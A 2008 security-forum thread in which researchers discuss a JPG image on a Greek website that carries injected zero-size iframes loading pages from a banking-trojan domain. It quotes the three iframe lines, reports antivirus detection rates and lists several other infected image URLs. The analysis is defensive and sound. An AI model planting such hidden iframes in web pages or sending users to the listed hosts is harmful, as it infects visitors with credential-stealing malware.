Author Topic: W32/JPGiframer  (Read 5292 times)

0 Members and 1 Guest are viewing this topic.

August 03, 2008, 11:13:36 pm
Read 5292 times

sowhat-x

  • Guest
What the heck...thought I'd finally plan my summer vacation,yet again...
seems that not even that can take place nowadays,without stumbling across newer malware attacks...
Have 'fun' looking at this:

Quote
hxxp://www.xenonaskazakou.gr/
Now check out the jpg image in the homepage... ;)
(Also added as an attachment...pass is "infected")
Detection rate...8/36 (22.23%)
http://www.virustotal.com/analisis/063dcf189bdaf5a42378ec3c5c3a82af

Quote
<iframe src=hxxp://www.goldwindos2000.com/xiaoaone/index.htm widht=0 height=0></iframe>
<iframe src=hxxp://www.goldwindos2000.com/hkeraone/hker.htm widht=0 height=0></iframe>
<iframe src=hxxp://www.goldwindos2000.com/xiaoaone/index.htm widht=0 height=0></iframe>

The injected goldwindos2000 domain is already in the list since late January.
Google revealed also the following ThreatExpert report from that time...Trojan-Spy.Banker.CCB:
http://www.threatexpert.com/report.aspx?uid=d399f86f-b341-4e1c-9a9c-822659b7721f
As with most malware nowadays,it's all about the money...

August 04, 2008, 01:10:35 am
Reply #1

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
very interesting...

August 04, 2008, 07:24:57 am
Reply #2

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Hmm, so i've been digging into this and reading JPG file format specs..

I noticed the string 'ducky' in the JFIF header and thought it might be a clue. It's not. This string is automatically added by Adobe Photoshop (so we know they used that to create the image).

I have a feeling that this might be the work of a file infector that targets files in the httpd directory... I've been unable to make this 'attack' work in a browser or email client so far... has anyone else had any luck?

TJS

August 04, 2008, 01:10:46 pm
Reply #3

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
"it's all about the money..."
E... but this iframe doesn't work)

August 04, 2008, 02:44:07 pm
Reply #4

sowhat-x

  • Guest
Quote
... but this iframe doesn't work
Yeap,at the current moment,at least the referenced iframe link to goldwindos2000.com appears "inactive",
but this doesn't really mean a thing,that's why I referenced the ThreatExpert report...  ;)

I believe these lamers are currently in early stages of experimenting/searching new injection techniques,
so I wouldn't really concentrate much on the domain itself...
but more on which browser/web app might be vulnerable out there...

August 04, 2008, 03:01:15 pm
Reply #5

sowhat-x

  • Guest
Heh,here we go - mystery solved (at least for the most part of it...)  :)
http://blog.scansafe.com/journal/2008/7/6/june-a-month-of-new-image-exploits.html
Plus...
http://www.viruslist.com/en/weblog?weblogid=208187540

And one more sample that I've digged while searching around...
Quote
hxxp://www.spinoza.gr/Images/home.gif

August 07, 2008, 05:24:57 pm
Reply #6

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

November 15, 2008, 03:58:04 pm
Reply #7

sowhat-x

  • Guest
Quote
hxxp://ly.wj.js.cn/Uppic/logo/2008724102151.gif
Result: 4/36 (11.12%)
http://www.virustotal.com/analisis/446dc2fe3c0aee3bc2d4888dbf284b1f